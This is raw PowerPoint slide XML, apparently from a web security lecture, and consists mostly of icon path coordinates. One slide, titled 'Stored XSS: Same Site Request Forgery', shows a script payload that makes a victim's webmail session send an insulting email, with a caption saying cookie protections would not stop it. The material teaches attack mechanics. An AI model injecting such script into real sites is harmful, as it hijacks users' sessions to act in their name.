                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12749" y="14999"/>
                      <a:pt x="13343" y="14655"/>
                      <a:pt x="13499" y="14061"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13624" y="13468"/>
                      <a:pt x="13280" y="12874"/>
                      <a:pt x="12686" y="12749"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10375" y="7750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10375" y="7750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="7594"/>
                      <a:pt x="9187" y="7969"/>
                      <a:pt x="9062" y="8562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8906" y="9156"/>
                      <a:pt x="9281" y="9750"/>
                      <a:pt x="9875" y="9874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10437" y="10030"/>
                      <a:pt x="11031" y="9656"/>
                      <a:pt x="11187" y="9062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11312" y="8469"/>
                      <a:pt x="10969" y="7906"/>
                      <a:pt x="10375" y="7750"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7375" y="10561"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7375" y="10561"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="6781" y="10436"/>
                      <a:pt x="6187" y="10780"/>
                      <a:pt x="6031" y="11374"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5906" y="11968"/>
                      <a:pt x="6250" y="12561"/>
                      <a:pt x="6844" y="12686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7437" y="12843"/>
                      <a:pt x="8031" y="12468"/>
                      <a:pt x="8156" y="11905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8312" y="11311"/>
                      <a:pt x="7937" y="10718"/>
                      <a:pt x="7375" y="10561"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13311" y="10530"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13311" y="10530"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12936" y="10436"/>
                      <a:pt x="12593" y="10655"/>
                      <a:pt x="12499" y="10999"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12405" y="11374"/>
                      <a:pt x="12624" y="11718"/>
                      <a:pt x="12999" y="11811"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13343" y="11905"/>
                      <a:pt x="13686" y="11686"/>
                      <a:pt x="13780" y="11311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13874" y="10968"/>
                      <a:pt x="13655" y="10624"/>
                      <a:pt x="13311" y="10530"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9812" y="11030"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9812" y="11030"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="10968"/>
                      <a:pt x="9094" y="11186"/>
                      <a:pt x="9031" y="11530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8937" y="11874"/>
                      <a:pt x="9156" y="12249"/>
                      <a:pt x="9500" y="12311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9844" y="12405"/>
                      <a:pt x="10219" y="12186"/>
                      <a:pt x="10281" y="11843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10375" y="11468"/>
                      <a:pt x="10156" y="11124"/>
                      <a:pt x="9812" y="11030"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9437" y="14124"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9437" y="14124"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9094" y="14030"/>
                      <a:pt x="8719" y="14249"/>
                      <a:pt x="8656" y="14593"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8562" y="14968"/>
                      <a:pt x="8781" y="15311"/>
                      <a:pt x="9125" y="15405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="15468"/>
                      <a:pt x="9844" y="15280"/>
                      <a:pt x="9906" y="14905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10000" y="14561"/>
                      <a:pt x="9781" y="14218"/>
                      <a:pt x="9437" y="14124"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4142589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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1428659"/>
            <a:ext cx="8430768" cy="265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74" tIns="32137" rIns="64274" bIns="32137">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="211044" algn="l"/>
                <a:tab pos="422087" algn="l"/>
                <a:tab pos="633130" algn="l"/>
                <a:tab pos="844174" algn="l"/>
                <a:tab pos="1055218" algn="l"/>
                <a:tab pos="1266261" algn="l"/>
                <a:tab pos="1477305" algn="l"/>
                <a:tab pos="1688348" algn="l"/>
                <a:tab pos="1899392" algn="l"/>
                <a:tab pos="2110435" algn="l"/>
                <a:tab pos="2321479" algn="l"/>
                <a:tab pos="2532522" algn="l"/>
                <a:tab pos="2743566" algn="l"/>
                <a:tab pos="2954609" algn="l"/>
                <a:tab pos="3165653" algn="l"/>
                <a:tab pos="3376696" algn="l"/>
                <a:tab pos="3587740" algn="l"/>
                <a:tab pos="3798783" algn="l"/>
                <a:tab pos="4009827" algn="l"/>
                <a:tab pos="4220870" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="2"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="211044" algn="l"/>
                <a:tab pos="422087" algn="l"/>
                <a:tab pos="633130" algn="l"/>
                <a:tab pos="844174" algn="l"/>
                <a:tab pos="1055218" algn="l"/>
                <a:tab pos="1266261" algn="l"/>
                <a:tab pos="1477305" algn="l"/>
                <a:tab pos="1688348" algn="l"/>
                <a:tab pos="1899392" algn="l"/>
                <a:tab pos="2110435" algn="l"/>
                <a:tab pos="2321479" algn="l"/>
                <a:tab pos="2532522" algn="l"/>
                <a:tab pos="2743566" algn="l"/>
                <a:tab pos="2954609" algn="l"/>
                <a:tab pos="3165653" algn="l"/>
                <a:tab pos="3376696" algn="l"/>
                <a:tab pos="3587740" algn="l"/>
                <a:tab pos="3798783" algn="l"/>
                <a:tab pos="4009827" algn="l"/>
                <a:tab pos="4220870" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="2"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var ajaxConn = new XHConn(); ajaxConn.connect("https://corp.cooollwebmailsystem.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="2"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>dest=boss@work.us&amp;subj=YouAreAJerk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="2"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>","GET");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="211044" algn="l"/>
                <a:tab pos="422087" algn="l"/>
                <a:tab pos="633130" algn="l"/>
                <a:tab pos="844174" algn="l"/>
                <a:tab pos="1055218" algn="l"/>
                <a:tab pos="1266261" algn="l"/>
                <a:tab pos="1477305" algn="l"/>
                <a:tab pos="1688348" algn="l"/>
                <a:tab pos="1899392" algn="l"/>
                <a:tab pos="2110435" algn="l"/>
                <a:tab pos="2321479" algn="l"/>
                <a:tab pos="2532522" algn="l"/>
                <a:tab pos="2743566" algn="l"/>
                <a:tab pos="2954609" algn="l"/>
                <a:tab pos="3165653" algn="l"/>
                <a:tab pos="3376696" algn="l"/>
                <a:tab pos="3587740" algn="l"/>
                <a:tab pos="3798783" algn="l"/>
                <a:tab pos="4009827" algn="l"/>
                <a:tab pos="4220870" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="2"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stored XSS: Same Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-26507" y="3814216"/>
            <a:ext cx="8713307" cy="2269450"/>
            <a:chOff x="1599637" y="4741322"/>
            <a:chExt cx="5777277" cy="1471762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1599637" y="5212940"/>
              <a:ext cx="4098655" cy="538910"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HTTPOnly</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> nor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SameSite</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> nor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Token Binding </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>cookies </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>would prevent this!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5905152" y="4741322"/>
              <a:ext cx="1471762" cy="1471762"/>
              <a:chOff x="4784129" y="3942988"/>
              <a:chExt cx="1260755" cy="1260755"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Oval 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4784129" y="3942988"/>
                <a:ext cx="1260755" cy="1260755"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4979235" y="4209355"/>
                <a:ext cx="888446" cy="708458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10094 w 24531"/>
                  <a:gd name="T1" fmla="*/ 1812 h 19562"/>
                  <a:gd name="T2" fmla="*/ 23718 w 24531"/>
                  <a:gd name="T3" fmla="*/ 4125 h 19562"/>
                  <a:gd name="T4" fmla="*/ 2156 w 24531"/>
                  <a:gd name="T5" fmla="*/ 18718 h 19562"/>
                  <a:gd name="T6" fmla="*/ 2156 w 24531"/>
                  <a:gd name="T7" fmla="*/ 2469 h 19562"/>
                  <a:gd name="T8" fmla="*/ 3469 w 24531"/>
                  <a:gd name="T9" fmla="*/ 812 h 19562"/>
                  <a:gd name="T10" fmla="*/ 9125 w 24531"/>
                  <a:gd name="T11" fmla="*/ 0 h 19562"/>
                  <a:gd name="T12" fmla="*/ 0 w 24531"/>
                  <a:gd name="T13" fmla="*/ 4125 h 19562"/>
                  <a:gd name="T14" fmla="*/ 22374 w 24531"/>
                  <a:gd name="T15" fmla="*/ 19561 h 19562"/>
                  <a:gd name="T16" fmla="*/ 22374 w 24531"/>
                  <a:gd name="T17" fmla="*/ 1656 h 19562"/>
                  <a:gd name="T18" fmla="*/ 9125 w 24531"/>
                  <a:gd name="T19" fmla="*/ 812 h 19562"/>
                  <a:gd name="T20" fmla="*/ 15999 w 24531"/>
                  <a:gd name="T21" fmla="*/ 8031 h 19562"/>
                  <a:gd name="T22" fmla="*/ 17311 w 24531"/>
                  <a:gd name="T23" fmla="*/ 7219 h 19562"/>
                  <a:gd name="T24" fmla="*/ 16405 w 24531"/>
                  <a:gd name="T25" fmla="*/ 10874 h 19562"/>
                  <a:gd name="T26" fmla="*/ 17218 w 24531"/>
                  <a:gd name="T27" fmla="*/ 10405 h 19562"/>
                  <a:gd name="T28" fmla="*/ 13218 w 24531"/>
                  <a:gd name="T29" fmla="*/ 6219 h 19562"/>
                  <a:gd name="T30" fmla="*/ 13999 w 24531"/>
                  <a:gd name="T31" fmla="*/ 5750 h 19562"/>
                  <a:gd name="T32" fmla="*/ 15718 w 24531"/>
                  <a:gd name="T33" fmla="*/ 3562 h 19562"/>
                  <a:gd name="T34" fmla="*/ 4094 w 24531"/>
                  <a:gd name="T35" fmla="*/ 10561 h 19562"/>
                  <a:gd name="T36" fmla="*/ 9875 w 24531"/>
                  <a:gd name="T37" fmla="*/ 17843 h 19562"/>
                  <a:gd name="T38" fmla="*/ 19374 w 24531"/>
                  <a:gd name="T39" fmla="*/ 6219 h 19562"/>
                  <a:gd name="T40" fmla="*/ 8687 w 24531"/>
                  <a:gd name="T41" fmla="*/ 16843 h 19562"/>
                  <a:gd name="T42" fmla="*/ 9562 w 24531"/>
                  <a:gd name="T43" fmla="*/ 6906 h 19562"/>
                  <a:gd name="T44" fmla="*/ 10031 w 24531"/>
                  <a:gd name="T45" fmla="*/ 6906 h 19562"/>
                  <a:gd name="T46" fmla="*/ 10656 w 24531"/>
                  <a:gd name="T47" fmla="*/ 6968 h 19562"/>
                  <a:gd name="T48" fmla="*/ 14155 w 24531"/>
                  <a:gd name="T49" fmla="*/ 9312 h 19562"/>
                  <a:gd name="T50" fmla="*/ 14624 w 24531"/>
                  <a:gd name="T51" fmla="*/ 13499 h 19562"/>
                  <a:gd name="T52" fmla="*/ 14155 w 24531"/>
                  <a:gd name="T53" fmla="*/ 14561 h 19562"/>
                  <a:gd name="T54" fmla="*/ 19218 w 24531"/>
                  <a:gd name="T55" fmla="*/ 10499 h 19562"/>
                  <a:gd name="T56" fmla="*/ 15468 w 24531"/>
                  <a:gd name="T57" fmla="*/ 13811 h 19562"/>
                  <a:gd name="T58" fmla="*/ 15593 w 24531"/>
                  <a:gd name="T59" fmla="*/ 13311 h 19562"/>
                  <a:gd name="T60" fmla="*/ 10875 w 24531"/>
                  <a:gd name="T61" fmla="*/ 6125 h 19562"/>
                  <a:gd name="T62" fmla="*/ 10469 w 24531"/>
                  <a:gd name="T63" fmla="*/ 6062 h 19562"/>
                  <a:gd name="T64" fmla="*/ 18624 w 24531"/>
                  <a:gd name="T65" fmla="*/ 6687 h 19562"/>
                  <a:gd name="T66" fmla="*/ 12686 w 24531"/>
                  <a:gd name="T67" fmla="*/ 12749 h 19562"/>
                  <a:gd name="T68" fmla="*/ 13499 w 24531"/>
                  <a:gd name="T69" fmla="*/ 14061 h 19562"/>
                  <a:gd name="T70" fmla="*/ 10375 w 24531"/>
                  <a:gd name="T71" fmla="*/ 7750 h 19562"/>
                  <a:gd name="T72" fmla="*/ 11187 w 24531"/>
                  <a:gd name="T73" fmla="*/ 9062 h 19562"/>
                  <a:gd name="T74" fmla="*/ 7375 w 24531"/>
                  <a:gd name="T75" fmla="*/ 10561 h 19562"/>
                  <a:gd name="T76" fmla="*/ 8156 w 24531"/>
                  <a:gd name="T77" fmla="*/ 11905 h 19562"/>
                  <a:gd name="T78" fmla="*/ 13311 w 24531"/>
                  <a:gd name="T79" fmla="*/ 10530 h 19562"/>
                  <a:gd name="T80" fmla="*/ 13780 w 24531"/>
                  <a:gd name="T81" fmla="*/ 11311 h 19562"/>
                  <a:gd name="T82" fmla="*/ 9812 w 24531"/>
                  <a:gd name="T83" fmla="*/ 11030 h 19562"/>
                  <a:gd name="T84" fmla="*/ 10281 w 24531"/>
                  <a:gd name="T85" fmla="*/ 11843 h 19562"/>
                  <a:gd name="T86" fmla="*/ 9437 w 24531"/>
                  <a:gd name="T87" fmla="*/ 14124 h 19562"/>
                  <a:gd name="T88" fmla="*/ 9906 w 24531"/>
                  <a:gd name="T89" fmla="*/ 14905 h 19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31" h="19562">
                    <a:moveTo>
                      <a:pt x="9125" y="812"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9125" y="812"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="812"/>
                      <a:pt x="10094" y="1156"/>
                      <a:pt x="10094" y="1812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10094" y="1812"/>
                      <a:pt x="10094" y="1812"/>
                      <a:pt x="10094" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10094" y="2469"/>
                      <a:pt x="10094" y="2469"/>
                      <a:pt x="22374" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23061" y="2469"/>
                      <a:pt x="23718" y="3125"/>
                      <a:pt x="23718" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23718" y="4125"/>
                      <a:pt x="23718" y="4125"/>
                      <a:pt x="23718" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23718" y="18061"/>
                      <a:pt x="23061" y="18718"/>
                      <a:pt x="22374" y="18718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22374" y="18718"/>
                      <a:pt x="22374" y="18718"/>
                      <a:pt x="2156" y="18718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="18718"/>
                      <a:pt x="812" y="18061"/>
                      <a:pt x="812" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="812" y="17405"/>
                      <a:pt x="812" y="17405"/>
                      <a:pt x="812" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="812" y="3125"/>
                      <a:pt x="1469" y="2469"/>
                      <a:pt x="2156" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2156" y="2469"/>
                      <a:pt x="2156" y="2469"/>
                      <a:pt x="2812" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2812" y="2469"/>
                      <a:pt x="2812" y="2469"/>
                      <a:pt x="2812" y="1812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2812" y="1156"/>
                      <a:pt x="3125" y="812"/>
                      <a:pt x="3469" y="812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3469" y="812"/>
                      <a:pt x="3469" y="812"/>
                      <a:pt x="9125" y="812"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9125" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9125" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3469" y="0"/>
                      <a:pt x="3469" y="0"/>
                      <a:pt x="3469" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2750" y="0"/>
                      <a:pt x="2031" y="562"/>
                      <a:pt x="2000" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="875" y="1750"/>
                      <a:pt x="0" y="2812"/>
                      <a:pt x="0" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="17405"/>
                      <a:pt x="0" y="17405"/>
                      <a:pt x="0" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18530"/>
                      <a:pt x="1000" y="19561"/>
                      <a:pt x="2156" y="19561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22374" y="19561"/>
                      <a:pt x="22374" y="19561"/>
                      <a:pt x="22374" y="19561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23499" y="19561"/>
                      <a:pt x="24530" y="18530"/>
                      <a:pt x="24530" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24530" y="4125"/>
                      <a:pt x="24530" y="4125"/>
                      <a:pt x="24530" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24530" y="2750"/>
                      <a:pt x="23561" y="1656"/>
                      <a:pt x="22374" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10937" y="1656"/>
                      <a:pt x="10937" y="1656"/>
                      <a:pt x="10937" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10875" y="625"/>
                      <a:pt x="10187" y="0"/>
                      <a:pt x="9125" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9125" y="812"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17311" y="7219"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17311" y="7219"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16718" y="7094"/>
                      <a:pt x="16124" y="7468"/>
                      <a:pt x="15999" y="8031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15843" y="8625"/>
                      <a:pt x="16218" y="9219"/>
                      <a:pt x="16811" y="9375"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17374" y="9500"/>
                      <a:pt x="17968" y="9156"/>
                      <a:pt x="18124" y="8562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18249" y="7969"/>
                      <a:pt x="17905" y="7375"/>
                      <a:pt x="17311" y="7219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17218" y="10405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17218" y="10405"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16843" y="10311"/>
                      <a:pt x="16499" y="10530"/>
                      <a:pt x="16405" y="10874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16311" y="11218"/>
                      <a:pt x="16530" y="11593"/>
                      <a:pt x="16905" y="11655"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17249" y="11749"/>
                      <a:pt x="17593" y="11530"/>
                      <a:pt x="17686" y="11186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17780" y="10843"/>
                      <a:pt x="17561" y="10468"/>
                      <a:pt x="17218" y="10405"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13999" y="5750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13999" y="5750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13655" y="5656"/>
                      <a:pt x="13280" y="5875"/>
                      <a:pt x="13218" y="6219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13124" y="6594"/>
                      <a:pt x="13343" y="6937"/>
                      <a:pt x="13686" y="7031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14030" y="7094"/>
                      <a:pt x="14405" y="6875"/>
                      <a:pt x="14499" y="6531"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14561" y="6187"/>
                      <a:pt x="14343" y="5844"/>
                      <a:pt x="13999" y="5750"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19374" y="6219"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19374" y="6219"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18530" y="4875"/>
                      <a:pt x="17249" y="3937"/>
                      <a:pt x="15718" y="3562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15249" y="3469"/>
                      <a:pt x="14780" y="3406"/>
                      <a:pt x="14311" y="3406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12343" y="3406"/>
                      <a:pt x="10500" y="4406"/>
                      <a:pt x="9406" y="6031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6844" y="6219"/>
                      <a:pt x="4719" y="8031"/>
                      <a:pt x="4094" y="10561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3719" y="12093"/>
                      <a:pt x="3969" y="13686"/>
                      <a:pt x="4812" y="15030"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5625" y="16374"/>
                      <a:pt x="6937" y="17311"/>
                      <a:pt x="8469" y="17686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8937" y="17811"/>
                      <a:pt x="9406" y="17843"/>
